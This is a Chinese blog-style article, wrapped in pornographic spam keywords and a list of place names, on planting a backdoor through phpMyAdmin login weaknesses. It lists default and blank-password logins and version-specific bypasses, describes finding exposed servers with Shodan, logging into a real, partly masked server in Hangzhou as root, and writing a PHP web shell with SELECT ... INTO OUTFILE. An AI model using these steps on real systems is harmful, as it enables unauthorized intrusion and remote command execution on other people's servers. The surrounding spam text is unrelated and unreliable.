最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

phpMyAdmin通過(guò)密碼漏洞留后門(mén)文件

 更新時(shí)間:2018年11月20日 09:51:28   作者:吃面包的科學(xué)怪人  
今天小編就為大家分享一篇關(guān)于phpMyAdmin通過(guò)密碼漏洞留后門(mén)文件,小編覺(jué)得內(nèi)容挺不錯(cuò)的,現(xiàn)在分享給大家,具有很好的參考價(jià)值,需要的朋友一起跟隨小編來(lái)看看吧
  • 默認(rèn) phpMyAdmin:用戶名 root 密碼 root 或空登陸。
  • 版本 2.11.3~2.11.4:用戶名 'localhost'@'@" 登陸,無(wú)需密碼。
  • 版本 2.11.9.2:用戶名 root 登陸,無(wú)需密碼。

經(jīng)測(cè)試,第二個(gè)漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理從略。

下面讓我們簡(jiǎn)單的上網(wǎng)看看能不能找到一些存在這樣漏洞的登陸頁(yè)面。

祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。

phpMyAdmin

先看看有沒(méi)有不需要密碼登陸的,逐一嘗試沒(méi)有后尋找名字中包含的版本號(hào)。這里我找到一個(gè)國(guó)內(nèi)的(浙江省·杭州市)。

地址已手動(dòng)打碼。

http://121.***.*.219:80/

登陸成功(root 權(quán)限)。

接下來(lái)你可以寫(xiě)一個(gè) outfile 到對(duì)方主機(jī)的網(wǎng)絡(luò)目錄下。俗稱 “留后門(mén)”。

SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后門(mén)文件的絕對(duì)路徑"

點(diǎn)擊運(yùn)行,不出意外便在對(duì)方主機(jī)留下了一個(gè)名為 runme.php 的后門(mén)文件。

總結(jié)

以上就是這篇文章的全部?jī)?nèi)容了,希望本文的內(nèi)容對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,謝謝大家對(duì)腳本之家的支持。如果你想了解更多相關(guān)內(nèi)容請(qǐng)查看下面相關(guān)鏈接

相關(guān)文章

最新評(píng)論

晴隆县| 云南省| 石河子市| 滁州市| 海城市| 龙井市| 务川| 集贤县| 东乡族自治县| 贺州市| 定西市| 定西市| 元朗区| 尚义县| 淄博市| 思南县| 定西市| 介休市| 高要市| 南昌县| 葫芦岛市| 贺州市| 开化县| 佳木斯市| 永胜县| 东兰县| 鹤岗市| 教育| 吉木乃县| 泰兴市| 义马市| 喀什市| 越西县| 北海市| 潼关县| 阳高县| 云林县| 伊吾县| 百色市| 孝义市| 安国市|